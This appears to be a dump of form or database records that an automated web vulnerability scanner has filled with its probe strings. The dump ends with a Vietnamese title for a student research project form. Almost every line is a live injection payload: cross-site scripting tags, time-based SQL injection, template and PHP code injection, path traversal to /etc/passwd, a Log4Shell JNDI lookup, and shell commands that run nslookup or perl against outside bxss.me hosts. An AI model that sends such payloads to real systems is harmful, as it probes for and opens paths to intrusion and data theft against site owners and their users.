1<agL5wog< 0
1<img sRc='http://attacker-9218/log.php? 0
1<a7Ueqzx x=9752> 0
1<ifRAme sRc=9106.com></IfRamE> 0
1<WATNBI>TFQDT[!+!]</WATNBI> 0
1caREe <ScRiPt >CC63(9782)</ScRiPt> 0
1}body{acu:Expre/**/SSion(CC63(9732))} 0
<a HrEF=jaVaScRiPT:> 0
1 0
1 0
@@Iy00f 0
1�����%2527%2522 0
1'" 0
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 0
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) 0
8yP7jUg9')) OR 166=(SELECT 166 FROM PG_SLEEP(15))-- 0
tunExkbe') OR 766=(SELECT 766 FROM PG_SLEEP(15))-- 0
JT2jFgRF' OR 634=(SELECT 634 FROM PG_SLEEP(15))-- 0
-1)) OR 445=(SELECT 445 FROM PG_SLEEP(15))-- 0
-5) OR 522=(SELECT 522 FROM PG_SLEEP(15))-- 0
-5 OR 212=(SELECT 212 FROM PG_SLEEP(15))-- 0
qLDIFMuY')); waitfor delay '0:0:15' -- 0
bNJQpdvS'); waitfor delay '0:0:15' -- 0
MizOnP1g'; waitfor delay '0:0:15' -- 0
1 waitfor delay '0:0:15' -- 0
-1)); waitfor delay '0:0:15' -- 0
-1); waitfor delay '0:0:15' -- 0
-1; waitfor delay '0:0:15' -- 0
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 0
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 0
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 0
if(now()=sysdate(),sleep(15),0) 0
-1" OR 2+401-401-1=0+0+0+1 -- 0
-1' OR 2+125-125-1=0+0+0+1 or 'aYn5YRPy'=' 0
-1' OR 2+487-487-1=0+0+0+1 -- 0
-1 OR 2+150-150-1=0+0+0+1 0
-1 OR 2+558-558-1=0+0+0+1 -- 0
mv6X9M6x 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
<a HrEF=http://xss.bxss.me></a> 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1<input autofocus onfocus=CC63(9148)> 0
1 0
1 0
�<img acu onmouseover=CC63(93601) //�> 0
1 0
1 0
1 0
1 0
1<ScRiPt>CC63(9530)</sCripT> 0
1 0
1 0
1 0
1 0
1\u003CScRiPt\CC63(9955)\u003C/sCripT\u003E 0
%31%3C%53%63%52%69%50%74%20%3E%43%43%36%33%289632%29%3C%2F%73%43%72%69%70%54%3E 0
1 0
1 0
1 0
1<img/src=">" onerror=alert(9687)> 0
1<img src=xyz OnErRor=CC63(9006)> 0
1<img src=//xss.bxss.me/t/dot.gif onload=CC63(9192)> 0
1<body onload=CC63(9411)> 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9618'> 0
0
1 0
1 0
1<isindex type=image src=1 onerror=CC63(9694)> 0
1 0
1 0
1<svg ��onload=CC63(9954);> 0
'"() 0
0
1<�ScRiPt >CC63(9732)</ScRiPt> 0
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9298></ScRiPt> 0
1 0
1 0
1 0
1 0
1<ScRiPt >CC63(9367)</ScRiPt> 0
1 0
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%43%43%36%33%28%39%33%36%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 0
1<script>CC63(9262)</script> 0
1<WYOSWX>HXPHZ[!+!]</WYOSWX> 0
1<ScRiPt >CC63(9132)</ScRiPt> 0
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") 0
1 0
acx__${98991*97996}__::.x 0
acx[[${98991*97996}]]xca 0
acx{{98991*97996}}xca 0
1 0
"+response.write(9304813*9044704)+" 0
'+response.write(9304813*9044704)+' 0
response.write(9304813*9044704) 0
1 0
1 0
1 0
'.print(md5(31337)).' 0
${@print(md5(31337))}\ 0
${@print(md5(31337))} 0
";print(md5(31337));$a=" 0
';print(md5(31337));$a=' 0
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡 0
0
1 0
".gethostbyname(lc("hitws"."bfbuqlvc0e2c1.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(74).chr(117).chr(77)." 0
'.gethostbyname(lc('hitmy'.'ugmppghh69709.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(88).chr(99).chr(86).' 0
1 0
1 0
1 0
1 0
1 0
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> 0
1 0
1 0
1 0
1 0
1 0
<th:t="${acx}#foreach 0
1 0
1 0
1 0
<%={{={@{#{${acx}}%> 0
1 0
acux4376%C0%BEz1%C0%BCz2a%90bcxuca4376 0
acu5947%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca5947 0
1 0
;(nslookup hitdwjqrtgdhrd9706.bxss.me||perl -e "gethostbyname('hitdwjqrtgdhrd9706.bxss.me')")|(nslookup hitdwjqrtgdhrd9706.bxss.me||perl -e "gethostbyname('hitdwjqrtgdhrd9706.bxss.me')")&(nslookup hitdwjqrtgdhrd9706.bxss.me||perl -e "gethostbyname('hitdwjqrtgdhrd9706.bxss.me')") 0
/../../../../../../../../../../windows/system32/BITSADMIN.exe 0
1 0
1 0
^(#$!@#$)(()))****** 0
!(()&&!|*|*| 0
) 0
1 0
`(nslookup hitiwdubpkell2b621.bxss.me||perl -e "gethostbyname('hitiwdubpkell2b621.bxss.me')")` 0
|(nslookup hitcarysamadk30281.bxss.me||perl -e "gethostbyname('hitcarysamadk30281.bxss.me')") 0
&(nslookup hitwecwxbgpkae682f.bxss.me||perl -e "gethostbyname('hitwecwxbgpkae682f.bxss.me')")&'\"`0&(nslookup hitwecwxbgpkae682f.bxss.me||perl -e "gethostbyname('hitwecwxbgpkae682f.bxss.me')")&`' 0
1 0
19439183 0
$(nslookup hitedlgdhopdydab59.bxss.me||perl -e "gethostbyname('hitedlgdhopdydab59.bxss.me')") 0
'"()&%<acx><ScRiPt >CC63(9199)</ScRiPt> 0
1 0
RhnaKsC3 0
1 0
1 0
1'"()&%<acx><ScRiPt >CC63(9459)</ScRiPt> 0
1 0
1 0
1&n904548=v957218 0
1 0
1 0
1 0
1 0
(nslookup hitaywuihafxgbe9ce.bxss.me||perl -e "gethostbyname('hitaywuihafxgbe9ce.bxss.me')") 0
|echo pftmoy$()\ cmedyn\nz^xyu||a #' |echo pftmoy$()\ cmedyn\nz^xyu||a #|" |echo pftmoy$()\ cmedyn\nz^xyu||a # 0
&echo erptea$()\ dgiehi\nz^xyu||a #' &echo erptea$()\ dgiehi\nz^xyu||a #|" &echo erptea$()\ dgiehi\nz^xyu||a # 0
1 0
echo gotwmf$()\ waekvj\nz^xyu||a #' &echo gotwmf$()\ waekvj\nz^xyu||a #|" &echo gotwmf$()\ waekvj\nz^xyu||a # 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
'+'A'.concat(70-3).concat(22*4).concat(101).concat(78).concat(107).concat(77)+(require'socket' Socket.gethostbyname('hitcf'+'ztdgkafb279af.bxss.me.')[3].to_s)+' 0
1 0
1 0
1 0
1 0
1 0
${9999432+10000409} 0
1 0
1 0
bxss.me/t/xss.html?%00 0
1 0
1 0
1 0
1 0
HttP://bxss.me/t/xss.html?%00 0
"+"A".concat(70-3).concat(22*4).concat(118).concat(72).concat(116).concat(73)+(require"socket" Socket.gethostbyname("hitob"+"lwsktpphaf062.bxss.me.")[3].to_s)+" 0
1 0
../1 0
1 0
../../../../../../../../../../../../../../windows/win.ini 0
1 0
../../../../../../../../../../../../../../etc/passwd 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 0
1 0
1 0
bxss.me 0
http://bxss.me/t/fit.txt%3F.jpg 0
Http://bxss.me/t/fit.txt 0
1 0
1some_inexistent_file_with_long_name%00.jpg 0
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
${j${::-n}di:dns${::-:}//hitmnbbdmeulra304b${::-.}bxss.me} 0
1 0
1 0
1 0
1 0
1 0
1 0
1BB0xrTzR2O 0
1 0
1 0
1 0
1 0
1 0
1 0
/xfs.bxss.me 0
1 0
1 0
1 0
1 0
<!-- 0
'" 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1<esi:include src="http://bxss.me/rpb.png"/> 0
1 0
1 0
1 0
1 0
1<aSZxZCC< 0
1<img sRc='http://attacker-9291/log.php? 0
1<agr81sT x=9738> 0
1<ifRAme sRc=9053.com></IfRamE> 0
1<WAOPQZ>RQE6L[!+!]</WAOPQZ> 0
1NHaNH <ScRiPt >WEPY(9049)</ScRiPt> 0
1 0
1 0
@@4BabU 0
1�����%2527%2522 0
1'" 0
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 0
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) 0
P3HAL4cu')) OR 729=(SELECT 729 FROM PG_SLEEP(15))-- 0
bw8marA6') OR 983=(SELECT 983 FROM PG_SLEEP(15))-- 0
3PahUxZa' OR 631=(SELECT 631 FROM PG_SLEEP(15))-- 0
-1)) OR 671=(SELECT 671 FROM PG_SLEEP(15))-- 0
-5) OR 76=(SELECT 76 FROM PG_SLEEP(15))-- 0
-5 OR 135=(SELECT 135 FROM PG_SLEEP(15))-- 0
V6N8em2t')); waitfor delay '0:0:15' -- 0
Xv9xOPjA'); waitfor delay '0:0:15' -- 0
1}body{acu:Expre/**/SSion(WEPY(9916))} 0
6W2tbg8L'; waitfor delay '0:0:15' -- 0
1 waitfor delay '0:0:15' -- 0
-1)); waitfor delay '0:0:15' -- 0
-1); waitfor delay '0:0:15' -- 0
-1; waitfor delay '0:0:15' -- 0
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 0
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 0
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 0
if(now()=sysdate(),sleep(15),0) 0
-1" OR 2+222-222-1=0+0+0+1 -- 0
-1' OR 2+315-315-1=0+0+0+1 or '9U6sXwJo'=' 0
-1' OR 2+620-620-1=0+0+0+1 -- 0
-1 OR 2+563-563-1=0+0+0+1 0
-1 OR 2+754-754-1=0+0+0+1 -- 0
<a HrEF=jaVaScRiPT:> 0
<a HrEF=http://xss.bxss.me></a> 0
1<input autofocus onfocus=WEPY(9845)> 0
�<img acu onmouseover=WEPY(94401) //�> 0
1<ScRiPt>WEPY(9025)</sCripT> 0
1\u003CScRiPt\WEPY(9630)\u003C/sCripT\u003E 0
%31%3C%53%63%52%69%50%74%20%3E%57%45%50%59%289520%29%3C%2F%73%43%72%69%70%54%3E 0
1<img/src=">" onerror=alert(9109)> 0
BeJyxm7o 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1<img src=xyz OnErRor=WEPY(9286)> 0
1<img src=//xss.bxss.me/t/dot.gif onload=WEPY(9605)> 0
1<body onload=WEPY(9461)> 0
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9064'> 0
1<isindex type=image src=1 onerror=WEPY(9788)> 0
1<svg ��onload=WEPY(9661);> 0
1<�ScRiPt >WEPY(9549)</ScRiPt> 0
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9949></ScRiPt> 0
1<ScRiPt >WEPY(9039)</ScRiPt> 0
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%57%45%50%59%28%39%35%32%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 0
1<script>WEPY(9199)</script> 0
1<WTPLYD>ISERF[!+!]</WTPLYD> 0
1<ScRiPt >WEPY(9984)</ScRiPt> 0
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") 0
acx__${98991*97996}__::.x 0
acx[[${98991*97996}]]xca 0
acx{{98991*97996}}xca 0
;(nslookup hittteuxsqrvsb92db.bxss.me||perl -e "gethostbyname('hittteuxsqrvsb92db.bxss.me')")|(nslookup hittteuxsqrvsb92db.bxss.me||perl -e "gethostbyname('hittteuxsqrvsb92db.bxss.me')")&(nslookup hittteuxsqrvsb92db.bxss.me||perl -e "gethostbyname('hittteuxsqrvsb92db.bxss.me')") 0
`(nslookup hitorrklfwgki62e6a.bxss.me||perl -e "gethostbyname('hitorrklfwgki62e6a.bxss.me')")` 0
|(nslookup hitrmhgspnyzufbccf.bxss.me||perl -e "gethostbyname('hitrmhgspnyzufbccf.bxss.me')") 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
&(nslookup hiteijbcjrneo52569.bxss.me||perl -e "gethostbyname('hiteijbcjrneo52569.bxss.me')")&'\"`0&(nslookup hiteijbcjrneo52569.bxss.me||perl -e "gethostbyname('hiteijbcjrneo52569.bxss.me')")&`' 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
$(nslookup hitofupxzkfls66bb0.bxss.me||perl -e "gethostbyname('hitofupxzkfls66bb0.bxss.me')") 0
bxss.me 0
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> 0
1 0
http://bxss.me/t/fit.txt%3F.jpg 0
Http://bxss.me/t/fit.txt 0
1some_inexistent_file_with_long_name%00.jpg 0
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
<th:t="${acx}#foreach 0
1 0
1 0
1 0
(nslookup hitwgcdzifbbw565ab.bxss.me||perl -e "gethostbyname('hitwgcdzifbbw565ab.bxss.me')") 0
|echo pirfue$()\ djhpmg\nz^xyu||a #' |echo pirfue$()\ djhpmg\nz^xyu||a #|" |echo pirfue$()\ djhpmg\nz^xyu||a # 0
&echo hicari$()\ qichrl\nz^xyu||a #' &echo hicari$()\ qichrl\nz^xyu||a #|" &echo hicari$()\ qichrl\nz^xyu||a # 0
echo rbpysq$()\ yfejuh\nz^xyu||a #' &echo rbpysq$()\ yfejuh\nz^xyu||a #|" &echo rbpysq$()\ yfejuh\nz^xyu||a # 0
1 0
<%={{={@{#{${acx}}%> 0
acux8151%C0%BEz1%C0%BCz2a%90bcxuca8151 0
acu3174%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3174 0
19281032 0
'"()&%<acx><ScRiPt >WEPY(9970)</ScRiPt> 0
../1 0
1'"()&%<acx><ScRiPt >WEPY(9802)</ScRiPt> 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
../../../../../../../../../../../../../../windows/win.ini 0
../../../../../../../../../../../../../../etc/passwd 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
'.print(md5(31337)).' 0
1 0
1 0
1 0
1 0
${@print(md5(31337))}\ 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 0
${j${::-n}di:dns${::-:}//hitkipiwcfyzdcb85a${::-.}bxss.me} 0
1 0
/../../../../../../../../../../windows/system32/BITSADMIN.exe 0
1 0
"+response.write(9499086*9249596)+" 0
'+response.write(9499086*9249596)+' 0
1 0
response.write(9499086*9249596) 0
1 0
${@print(md5(31337))} 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
<!-- 0
1 0
1 0
'"() 0
1 0
0
1 0
1 0
1 0
";print(md5(31337));$a=" 0
1 0
Y85WZU4C 0
1 0
".gethostbyname(lc("hitag"."rgksebcn95c4b.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(87).chr(116).chr(81)." 0
'.gethostbyname(lc('hithy'.'cowwjspg1fa49.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(86).chr(112).chr(70).' 0
'" 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
${10000285+9999390} 0
1 0
1 0
1 0
1 0
';print(md5(31337));$a=' 0
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡 0
0
1 0
1 0
bxss.me/t/xss.html?%00 0
HttP://bxss.me/t/xss.html?%00 0
1 0
^(#$!@#$)(()))****** 0
!(()&&!|*|*| 0
) 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1&n926436=v952035 0
1 0
1 0
1 0
1 0
1<esi:include src="http://bxss.me/rpb.png"/> 0
/xfs.bxss.me 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1C2ZH6BDDeO 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
'+'A'.concat(70-3).concat(22*4).concat(101).concat(82).concat(98).concat(83)+(require'socket' Socket.gethostbyname('hitsh'+'ktoewdkd14c1e.bxss.me.')[3].to_s)+' 0
"+"A".concat(70-3).concat(22*4).concat(118).concat(80).concat(103).concat(82)+(require"socket" Socket.gethostbyname("hitcz"+"cdmedcqb087fd.bxss.me.")[3].to_s)+" 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
Biểu mẫu đề tài KHCN - dành cho Sinh viên 3040
